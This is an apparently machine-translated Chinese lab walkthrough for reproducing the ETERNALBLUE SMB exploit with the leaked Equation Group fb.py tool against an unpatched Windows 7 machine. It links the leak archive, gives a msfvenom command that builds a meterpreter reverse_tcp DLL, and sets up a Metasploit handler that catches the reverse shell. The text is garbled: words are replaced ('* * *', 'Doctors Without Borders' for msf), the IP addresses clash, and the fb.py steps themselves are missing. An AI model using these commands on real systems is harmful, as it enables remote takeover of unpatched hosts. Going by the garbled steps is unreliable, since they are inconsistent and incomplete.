方程式ETERNALBLUE之fb.py的复现
1。环境简介
* * *机win2003
ip: 192.168.1.105
* * *机卡利:
ip: 192.168.1.106
靶机(被* * *机)window7 x64(未装smb漏洞补丁)
ip: 192.168.1.100
2. windows2003 * * *机
* * *机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32 - 221. -赢得amd64 py2.6.exe: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master
安装好后,需要在win2003设置环境变量:
将整个ETERNALBLUE目录下的windows拷贝到* * *机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在* * *机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
3 * * *机卡莉上
利用msf生成一个dll劫持文件:
msfvenom - p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 - f dll祝辞/opt/s。dll
将年代。dll文件拷贝到windows2003的C盘目录下:
在无国界医生组织下开启msfpaylod监听:
使用利用/多/处理程序设置lhost 192.168.1.106 lport
5555
设置负载windows/x64/meterpreter/reverse_tcp
利用
最后在无国界医生组织下可以看到成功反弹外壳:
